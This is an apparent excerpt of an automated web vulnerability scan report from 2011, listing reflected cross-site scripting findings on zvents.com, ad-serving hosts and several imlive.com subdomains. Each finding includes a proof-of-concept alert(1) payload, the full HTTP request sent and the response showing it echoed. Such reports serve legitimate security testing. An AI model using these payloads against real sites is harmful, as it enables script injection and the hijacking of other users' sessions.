Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexEiCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTI1NzkyOTk5OTk5OTkAxfYiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU2MjMxNzAwMDAwMDAxAOy0IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIjYWxiYW55LW55ZGUxNzMiPjxhPjFkMTE3N2MwYzczIgpzdGF0ZSIHTlk%3D--4942d3b29882f1c14f2c13d6a8c32454e08563a2; path=/; expires=Fri, 29-Apr-2011 04:49:15 GMT; HttpOnly
Content-Length: 54379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-nyde173"><a>1d1177c0c73/events" />
...[SNIP]...

4.914. http://www.zvents.com/albany-ny/events [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/albany-ny/events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46253"><script>alert(1)</script>561e7e31c43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events?46253"><script>alert(1)</script>561e7e31c43=1 HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:48:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 52
ETag: "65871602adf14b5ae97e610f643c644e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uew4iCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmciD0FsYmFueSwgTlkiCnN0YXRlIgdOWQ%3D%3D--51f4096067c2ce5072e1ca3c5f593268f1df8d3d; path=/; expires=Fri, 29-Apr-2011 04:48:25 GMT; HttpOnly
Content-Length: 54385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events?46253"><script>alert(1)</script>561e7e31c43=1" />
...[SNIP]...

4.915. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.doubleclick.net.57389.9231.302br.net
Path:	/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 909ef"-alert(1)-"44de56eaa23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=909ef"-alert(1)-"44de56eaa23
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6D8A06AB61E2CD22ACDBB645CBD9740D; Path=/
Content-Type: text/html
Content-Length: 7086
Date: Sat, 29 Jan 2011 01:55:06 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.google.com/search?hl=en&q=909ef"-alert(1)-"44de56eaa23",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU
...[SNIP]...

4.916. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.doubleclick.net.57390.9231.302br.net
Path:	/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20871"-alert(1)-"47bce010404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=20871"-alert(1)-"47bce010404

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=07CB13A74C1386A227CBF5EF34B9112E; Path=/
Content-Type: text/javascript
Content-Length: 6853
Date: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=20871"-alert(1)-"47bce010404",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.7",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};

// use closure to keep
...[SNIP]...

4.917. http://ar.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e41c'-alert(1)-'966bdb815ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9e41c'-alert(1)-'966bdb815ef

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=a50m4b45qikd1i4514x4hlbg; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:47 GMT; path=/
Set-Cookie: ASP.NET_SessionId=a50m4b45qikd1i4514x4hlbg; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:47 GMT; path=/
Set-Cookie: spvdr=vd=4e3caa11-2c53-455d-aeb6-23456dfa827b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:47 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:46 GMT
Connection: close
Content-Length: 18423
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ar.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=9e41c'-alert(1)-'966bdb815ef&iy=dallas&id=44&iu=1&vd=4e3caa11-2c53-455d-aeb6-23456dfa827b';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.918. http://ar.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ar.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803bf'-alert(1)-'0a99d8be53c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=803bf'-alert(1)-'0a99d8be53c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ewf5ejes3cp04k55nvht3p45; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ewf5ejes3cp04k55nvht3p45; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:53 GMT; path=/
Set-Cookie: spvdr=vd=567a60ee-ed7f-4de5-bea0-26314350146c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 20847
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=ar.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=803bf'-alert(1)-'0a99d8be53c&iy=dallas&id=44&iu=1&vd=567a60ee-ed7f-4de5-bea0-26314350146c';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.919. http://br.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27acf'-alert(1)-'861f82f4c0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=27acf'-alert(1)-'861f82f4c0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nkg2nsbntcdfpjbrfiayib55; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:16:54 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nkg2nsbntcdfpjbrfiayib55; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:16:54 GMT; path=/
Set-Cookie: spvdr=vd=76a3aa87-b7ef-43f9-a928-b6a2beb486e7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 18277
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=27acf'-alert(1)-'861f82f4c0a&iy=dallas&id=44&iu=1&vd=76a3aa87-b7ef-43f9-a928-b6a2beb486e7';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.920. http://br.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a328'-alert(1)-'eadcfd684a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6a328'-alert(1)-'eadcfd684a2

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=anvfcz45cym1eq45uegwmg45; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=anvfcz45cym1eq45uegwmg45; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: spvdr=vd=c9a4e47e-04fb-49d0-a02e-72013ee5baf4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:05 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:04 GMT
Connection: close
Content-Length: 20745
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/login.aspx&he=br.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=6a328'-alert(1)-'eadcfd684a2&iy=dallas&id=44&iu=1&vd=c9a4e47e-04fb-49d0-a02e-72013ee5baf4';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.921. http://cafr.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e0d'-alert(1)-'85ef759ec87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=97e0d'-alert(1)-'85ef759ec87

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=abjerb55miue1jybuviox355; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:16:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=abjerb55miue1jybuviox355; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:16:56 GMT; path=/
Set-Cookie: spvdr=vd=b251e2ee-c181-407f-9403-d9aeab43a548&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:56 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:55 GMT
Connection: close
Content-Length: 18800
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=97e0d'-alert(1)-'85ef759ec87&iy=dallas&id=44&iu=1&vd=b251e2ee-c181-407f-9403-d9aeab43a548';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.922. http://cafr.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9536b'-alert(1)-'e58569d4bd5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9536b'-alert(1)-'e58569d4bd5

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=jrzbde55yhvkm0yd0wajeo55; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:17:03 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jrzbde55yhvkm0yd0wajeo55; path=/; HttpOnly
Set-Cookie: pcafr=; expires=Thu, 27-Jan-2011 14:17:03 GMT; path=/
Set-Cookie: spvdr=vd=6a0168f5-b4e1-4005-82b3-4d8109481900&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:03 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:03 GMT
Connection: close
Content-Length: 220503
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=cafr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=9536b'-alert(1)-'e58569d4bd5&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=6a0168f5-b4e1-4005-82b3-4d8109481900';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.923. http://de.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6236'-alert(1)-'6b063b5f82a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e6236'-alert(1)-'6b063b5f82a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wmkuv23dire3y5455dflznbk; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:00 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wmkuv23dire3y5455dflznbk; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:00 GMT; path=/
Set-Cookie: spvdr=vd=4e0a90f8-4f17-4e29-82a0-f518b35446a3&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:00 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:00 GMT
Connection: close
Content-Length: 18350
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
